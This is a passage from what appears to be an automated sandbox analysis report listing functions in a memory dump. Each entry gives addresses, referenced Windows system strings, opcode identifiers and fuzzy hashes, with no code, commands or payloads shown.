                                          • Instruction Fuzzy Hash: B9510771E1021DAFDF11DFA9CC84BEEBBFCAB44758F100569E615B7290D670A905CBA0
                                          Function 012A04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                          Download Yara Rule
                                          Strings
                                          • kLsE, xrefs: 012A0540
                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 012A063D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                          • API String ID: 0-2547482624
                                          • Opcode ID: 0a999f0509883676219a1bc0bfbf25977653170c8a096945506c42321f2229b6
                                          • Instruction ID: 2b2a897eea450ec24adfdcbeb508d6b6ed9266158d96368e49f1cf78a9981ac5
                                          • Opcode Fuzzy Hash: 0a999f0509883676219a1bc0bfbf25977653170c8a096945506c42321f2229b6
                                          • Instruction Fuzzy Hash: 8051ACB15247438FD724EF69C4406A7BBE4AF84708F50483EEAEA87241E770E545CB9A
                                          Function 012AA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                          Download Yara Rule
                                          Strings
                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 012AA309
                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 012AA2FB
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                          • API String ID: 0-2876891731
                                          • Opcode ID: 324548ccf7112adbbdd152ad05a6e02ef11482b3b254938373c0bff9c7323f46
                                          • Instruction ID: 8f799578399cab6d51ca40d875d671a9882acdb4280f2c2133739a4682e2453a
                                          • Opcode Fuzzy Hash: 324548ccf7112adbbdd152ad05a6e02ef11482b3b254938373c0bff9c7323f46
                                          • Instruction Fuzzy Hash: 3A41CF30A24A5ADBEB16CF6DC894B6EBBF4FF84704F1440A5EA01DB291E3B5D900CB50
                                          Function 012DA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Cleanup Group$Threadpool!
                                          • API String ID: 2994545307-4008356553
                                          • Opcode ID: 99697027cb34ea42b1400a55b5f998e04e021b058fb2b1547ba642b9dea62084
                                          • Instruction ID: 4be5f52c8ed8b48ea8a3c65a9cd1059cd7127c788bf867d176f15edd4786ac9a
                                          • Opcode Fuzzy Hash: 99697027cb34ea42b1400a55b5f998e04e021b058fb2b1547ba642b9dea62084
                                          • Instruction Fuzzy Hash: 1701F4B2264744EFE311DF14CD46F26B7E8E794725F048939B648C7190E3B4D804CB86
                                          Function 012AC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: MUI
                                          • API String ID: 0-1339004836
                                          • Opcode ID: 555e0cdb3d08d517b7cc5338efcb14f2f83b0d5085fc5d475202b94aaa5b752e
                                          • Instruction ID: 863bc4a5cb50049f4f3df88b68916e070544acaacaf600e718686018a3a20163
                                          • Opcode Fuzzy Hash: 555e0cdb3d08d517b7cc5338efcb14f2f83b0d5085fc5d475202b94aaa5b752e
                                          • Instruction Fuzzy Hash: 3A827C75E202198FEB25CFA8C880BEDBBB5FF48310F54816AEA19AB751D7709941CF50
                                          Function 01326420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: 3a5be0288bf0cf5e1b3ce9999143181a5b5bea9d4a168913eabd574b2956f4dd
                                          • Instruction ID: 9003dd1b5348f50a352353df46deca179f8dbc438a4c5f59e65b3f549fbb7061
                                          • Opcode Fuzzy Hash: 3a5be0288bf0cf5e1b3ce9999143181a5b5bea9d4a168913eabd574b2956f4dd
                                          • Instruction Fuzzy Hash: 409174B1910229AFEB21EF95CC85FAE7BB8EF14B54F104155FB01AB190D774AD04CB90
                                          Function 0134E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: c7a778044852059cc8f3a7d58b5db7f98509bcaa9493062bdc2190114dcf1882
                                          • Instruction ID: f84dcccdb406f2964547e9e34aabe2644b868e1bdcd3556b435409a63b6bad8f
                                          • Opcode Fuzzy Hash: c7a778044852059cc8f3a7d58b5db7f98509bcaa9493062bdc2190114dcf1882
                                          • Instruction Fuzzy Hash: ED918F72910649BFDB26ABA5DC84FEFBBB9FF55748F100029F501A7250E778A901CB90
                                          Function 012DA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalTags
                                          • API String ID: 0-1106856819
                                          • Opcode ID: 0c8beab8328416843eb8e13beaba365417e05789ddb8b013ea4ae573c872da08
                                          • Instruction ID: 78f06120e95582ac7359ca8ded13c2d1962694f48cc577c5c893ee15b3d9d061
                                          • Opcode Fuzzy Hash: 0c8beab8328416843eb8e13beaba365417e05789ddb8b013ea4ae573c872da08
                                          • Instruction Fuzzy Hash: FC7180B5E0021ACFDF28CF9CD591AADBBB1BF88714F14812EE905A7245E7B19941CB50
                                          Function 01344978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .mui
                                          • API String ID: 0-1199573805
                                          • Opcode ID: e7d3660928202ef1737245f16da4205463189b8dfc393eb7c5a00ed63c289419
                                          • Instruction ID: 5d7f1123de0ae5fbbd480db695ef7ffb340c9def6016aed7fa7c4644316192b0
                                          • Opcode Fuzzy Hash: e7d3660928202ef1737245f16da4205463189b8dfc393eb7c5a00ed63c289419
                                          • Instruction Fuzzy Hash: 3F519372D1022A9BDF10DF99D940BAEBBF8AF04758F054139EA11BB240D738AC01CBE4
                                          Function 012BE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: EXT-
                                          • API String ID: 0-1948896318
                                          • Opcode ID: 0bec5c9219768c0c16e4fe987f07d647e7878bc4508f61df3549df0257b1df17
                                          • Instruction ID: ae67c54eb3e089ed7d83a6b9a5446da9d2049d32c6aa0426a9d4fd18fb2b0406
                                          • Opcode Fuzzy Hash: 0bec5c9219768c0c16e4fe987f07d647e7878bc4508f61df3549df0257b1df17
                                          • Instruction Fuzzy Hash: D441B372528302ABD715DA75C880BEBB7E8AF98784F450A2DF684D7140E674D904C793
                                          Function 0131C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          • Opcode ID: 4dd24f75e157d9e3839e10701d3a090cd757ce8a21e8075f15477d77129c06c1
                                          • Instruction ID: cc51d99bddd9ca2574745f50b11037f2787156c1db97c8acc4981c880b6617ff
                                          • Opcode Fuzzy Hash: 4dd24f75e157d9e3839e10701d3a090cd757ce8a21e8075f15477d77129c06c1
                                          • Instruction Fuzzy Hash: 344154B1D5012DABDF21DA54CC84FEEBB7CAB44718F4045A5EA08A7144DB709E89CF94
                                          Function 01336B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #
                                          • API String ID: 0-1885708031
                                          • Opcode ID: 119b87fabfedb641c6ebb54b7089b0e55829c207cd16651f4f06057ca0626143
                                          • Instruction ID: 299319f2de6dd81b9c74503574f56a273c85efd0fbea8d38f41b3eae0704f2c8
                                          • Opcode Fuzzy Hash: 119b87fabfedb641c6ebb54b7089b0e55829c207cd16651f4f06057ca0626143
                                          • Instruction Fuzzy Hash: 58314C71A00749AFDF22DB69C855BEE7BB8DF84708F504028EA419B282C775DE05CB58
                                          Function 0132892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                          Download Yara Rule
                                          Strings
                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0132895E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                          • API String ID: 0-702105204
                                          • Opcode ID: b070fb8cd30150f955688b7d48990200096ab59755f41991a9bdc4d2ebd0b209
                                          • Instruction ID: fb1a96db81324ee40d244c557c1fd7fce682cde41dff86aa12b97e4877a173d1
                                          • Opcode Fuzzy Hash: b070fb8cd30150f955688b7d48990200096ab59755f41991a9bdc4d2ebd0b209
                                          • Instruction Fuzzy Hash: DF01A2323102359FEB257F5A9884BAA7BA9EF8575CF0404ADF68116951CB21B881C792
                                          Function 01342000 Relevance: .8, Instructions: 757COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ebabc86d307afabdc4dcfa8e0f1ee906453784c1931b6242c19dbd422864cbdd
                                          • Instruction ID: 57e06e7d60508285ccd518edc1d8ce2330483469f76e8a5ff486de2618a15024
                                          • Opcode Fuzzy Hash: ebabc86d307afabdc4dcfa8e0f1ee906453784c1931b6242c19dbd422864cbdd
                                          • Instruction Fuzzy Hash: 5942D4356183418FE725CF68D890A6FBBE5FF88308F08092DFA82A7250D771E845CB52
                                          Function 01338158 Relevance: .6, Instructions: 617COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2f7647eff39fcc584bbf2ca6a3fbe8c924bb3c9fcc2d990236875d868a4b6799
                                          • Instruction ID: 1297017404391ee88b86725aea8f0d9506d96da3149ea723bf2903bf1e23ab10
                                          • Opcode Fuzzy Hash: 2f7647eff39fcc584bbf2ca6a3fbe8c924bb3c9fcc2d990236875d868a4b6799
                                          • Instruction Fuzzy Hash: A5427C75E102198FEB25CF69C881BADBBF5BF88314F1482D9E948EB242D7349981CF54
                                          Function 012B2840 Relevance: .6, Instructions: 605COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 41fd215446eced2548f2ab31a9307331f45e4c0d637a2b3de34d31cff818d4cf
                                          • Instruction ID: ed22d5960ebae5d10775a96999894c8c5b337f666195b7580ce7a8062ab4a4f4
                                          • Opcode Fuzzy Hash: 41fd215446eced2548f2ab31a9307331f45e4c0d637a2b3de34d31cff818d4cf
                                          • Instruction Fuzzy Hash: 383212B0A00719CFDB26CF69C8617BEBBF6BF84708F24411DD5469B688D735A921CB50
                                          Function 0134A118 Relevance: .6, Instructions: 591COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b7d5ea316e8fec127300264815ec260de257b1ba39bbe2d90c04746cf6dee24f
                                          • Instruction ID: a859f40d181ad4130b9abf5b85aabe7e82c528915a61e02211bcf47701731581
                                          • Opcode Fuzzy Hash: b7d5ea316e8fec127300264815ec260de257b1ba39bbe2d90c04746cf6dee24f
                                          • Instruction Fuzzy Hash: 6022E2742846658FEB25CF2DC094376BBF1AF44308F088499E9978F686E739F452DB60
                                          Function 0133892B Relevance: .4, Instructions: 386COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d83c25876a2545c23fbab93e97e85d44fe3aa59bb97606f633b0edd55e3ccbf6
                                          • Instruction ID: 84a3227c8521149aec8da1e15cd5a50d3f1cd30ca944757e7fb7a61c961e0844
                                          • Opcode Fuzzy Hash: d83c25876a2545c23fbab93e97e85d44fe3aa59bb97606f633b0edd55e3ccbf6
                                          • Instruction Fuzzy Hash: 42D1E571E0060A8BDF19CF69C841AFEB7F5AFC8308F1882A9E955E7241D735E906CB54
                                          Function 012A65D0 Relevance: .4, Instructions: 383COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1c77143bd6b0f82fa211483e19e1dca37bda120e4983ff5e502684591310744e
                                          • Instruction ID: bceb7afba0c06ed0744c021eabe2fd6ab114ccdec0db98dcf796504dc46e97de
                                          • Opcode Fuzzy Hash: 1c77143bd6b0f82fa211483e19e1dca37bda120e4983ff5e502684591310744e
                                          • Instruction Fuzzy Hash: 09E1A071618342CFC719CF28C490A6ABBF1FF89314F49896DE99587351EB31E909CB92
                                          Function 01298397 Relevance: .4, Instructions: 380COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 19aada6fab5ebf82a6cc29f27773983ca6441e7f1ba0536ceaacf56f72045736
                                          • Instruction ID: 6ef4da9e30970a976cb209fdad4e6bda949576a94c32117081460788eca9c8f0
                                          • Opcode Fuzzy Hash: 19aada6fab5ebf82a6cc29f27773983ca6441e7f1ba0536ceaacf56f72045736
                                          • Instruction Fuzzy Hash: 61D1D171A2020A9FDF18DF6CC881ABEB7A5FF55704F08422DEA16DB280E734D955CB60
                                          Function 01328243 Relevance: .3, Instructions: 322COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                          • Instruction ID: 10e0dca906b6ac123df0e637929c79086fae1153c4449d15b85bd00ce7e99d90
                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                          • Instruction Fuzzy Hash: 1DB14274A007159FDB24EF99C940AABBBF9FF85308F14449DEA4297790DB34E905CB10
                                          Function 012B0535 Relevance: .3, Instructions: 300COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                          • Instruction ID: c49523593831bff375aaadf0eadef46d10e64f9e10ada707aae4ea0447fbd1e1
                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                          • Instruction Fuzzy Hash: 25B11531620646AFDB27CB68C890BBFBBF6BF84344F140159E65297281DB70EE41CB94
                                          Function 012A83C0 Relevance: .3, Instructions: 281COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: af4fca12e1e4b7bc863c3683bc3e5cb33e83ad66f9984a0e970ad1fe2d787ad0
                                          • Instruction ID: db9e0aeda2609311cc3bd86668f5f88f5d92955e21e826f8c64f399d8c36d8ff
                                          • Opcode Fuzzy Hash: af4fca12e1e4b7bc863c3683bc3e5cb33e83ad66f9984a0e970ad1fe2d787ad0
                                          • Instruction Fuzzy Hash: 07C147741183818FE764DF19C494BABB7E5FF88308F44496DEA8987291D774E908CF92
                                          Function 0129C427 Relevance: .3, Instructions: 280COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 29c8d019f3018da51627ac1696b6a6f9316f6327480401ec5a932857c012c315
                                          • Instruction ID: e3922fbfb3df9a6ea3dee2f11a8fdd7af75663d88349366f1b54f81810947203
                                          • Opcode Fuzzy Hash: 29c8d019f3018da51627ac1696b6a6f9316f6327480401ec5a932857c012c315
                                          • Instruction Fuzzy Hash: 3FB16170A202668BDB74DF58D890BB9B7B5EF44700F0485E9D60AE7281EB70DD85CB20
                                          Function 012CE5E7 Relevance: .3, Instructions: 278COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7edba76320f7020c90652d4404b22f72c9adf20562acee10987e584dd11c7e17
                                          • Instruction ID: 078dd5ad5f9b67ee8ef07b389e3c5196b01c6f87d291b2e34b3f5568545ea502
                                          • Opcode Fuzzy Hash: 7edba76320f7020c90652d4404b22f72c9adf20562acee10987e584dd11c7e17
                                          • Instruction Fuzzy Hash: 92A12531E206159FEB36DB5CC855BAEBFE8BB01B18F160219EB01AB2C1D7749D40CB91
                                          Function 012E0185 Relevance: .3, Instructions: 276COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6f8944689332c294304abfff2a8739e33e83073b601cbd3744e9082c6c2706bd
                                          • Instruction ID: 8b30b52b9f2b9d789f5037fbcc079555a6d7218c865bc2fa912a731959c70d90
                                          • Opcode Fuzzy Hash: 6f8944689332c294304abfff2a8739e33e83073b601cbd3744e9082c6c2706bd
                                          • Instruction Fuzzy Hash: 65A11571B20616DFDB24CF69C9A4BBAB7F5FF54318F404029EA05A7281DBB4E812CB54
                                          Function 01374500 Relevance: .3, Instructions: 275COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ab750fb843308f0ee118cabac714b2ff0c0ae81766be121de6392af92f843e9c
                                          • Instruction ID: 578bbc7bc1d33b472f4e2cce9085e1f39642234bea327817e1b0b1144c62f60d
                                          • Opcode Fuzzy Hash: ab750fb843308f0ee118cabac714b2ff0c0ae81766be121de6392af92f843e9c
                                          • Instruction Fuzzy Hash: A0A1EDB2A14252EFC722DF28C980B6ABBE9FF48758F450528F5959B651D339FC00CB91
                                          Function 01372B57 Relevance: .3, Instructions: 266COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                          • Instruction ID: df0f3791717ba4cc1821ebcf419ef8731f56751f9ec1297f7e03b1322fb2de4a
                                          • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                          • Instruction Fuzzy Hash: 09B13A71E0065ADFDF29CFA9C880AAEBBB5FF48314F148129E918A7754D734A941CB90
                                          Function 013260E0 Relevance: .3, Instructions: 264COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e299d7a5b01fe199c6f85d8c6767afb51200444fc8abdfb699dce3e08986e276
                                          • Instruction ID: ccdc0167445cb726bdd164d28b0d9cffecfddc5dfacb28c7a651f20c563f8267
                                          • Opcode Fuzzy Hash: e299d7a5b01fe199c6f85d8c6767afb51200444fc8abdfb699dce3e08986e276
                                          • Instruction Fuzzy Hash: 1D91B4B1D0022AAFDB15DF68D885BBEBBB9AF48714F154159EA10AB350D734E9008BA0
                                          Function 012BE3F0 Relevance: .3, Instructions: 261COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5e4b8153ffda9b487a4df9e281b890f5aa8c0d61cff4eec69e659d409a47df64
                                          • Instruction ID: 419244d09fb893b829e62d1c89da8ddd140373acb52c798d959828c466b95840
                                          • Opcode Fuzzy Hash: 5e4b8153ffda9b487a4df9e281b890f5aa8c0d61cff4eec69e659d409a47df64
                                          • Instruction Fuzzy Hash: 61916871A20212CBEB25DB1CD8C1BFE7BF1EF94798F064065EA059B381E638D941C751
                                          Function 0136AB40 Relevance: .2, Instructions: 222COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                          • Instruction ID: ca6b83a99956398b582bbfc5750678eba272a6c9eb87d4852b837c9860fe4293
                                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                          • Instruction Fuzzy Hash: AA817171A102099FDF19CF98C890AAEBBFAFF94314F18C569D916AB348D774E901CB50
                                          Function 012DE284 Relevance: .2, Instructions: 212COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8bb15e41af9f035862766101a1f96671bbfdced69f39e0af7b220ca08dd32fde
                                          • Instruction ID: 5ee7516bfd4cdef2b72a1d302d5b82f0e395a948856f36598e98a9a016f3295b
                                          • Opcode Fuzzy Hash: 8bb15e41af9f035862766101a1f96671bbfdced69f39e0af7b220ca08dd32fde
                                          • Instruction Fuzzy Hash: F0815F71A10609EFDB25CFA9C880BEEBBF9FF48354F114429E656A7250DB70AC45CB60
                                          Function 012BC640 Relevance: .2, Instructions: 206COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1aa54362b0e084398961d58119626a8060a4f0e593488e05748a23892ab16ae4
                                          • Instruction ID: bb415d979aea5fcd167e6d1ffd34fbb779a4ce73f1d9b03f50dd8e454aed8aed
                                          • Opcode Fuzzy Hash: 1aa54362b0e084398961d58119626a8060a4f0e593488e05748a23892ab16ae4
                                          • Instruction Fuzzy Hash: 6471D0B5C25625DBCB2A8F58C4A07FEBBF9FF58754F14425AE941AB390D3709810CB90
                                          Function 013547A0 Relevance: .2, Instructions: 202COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
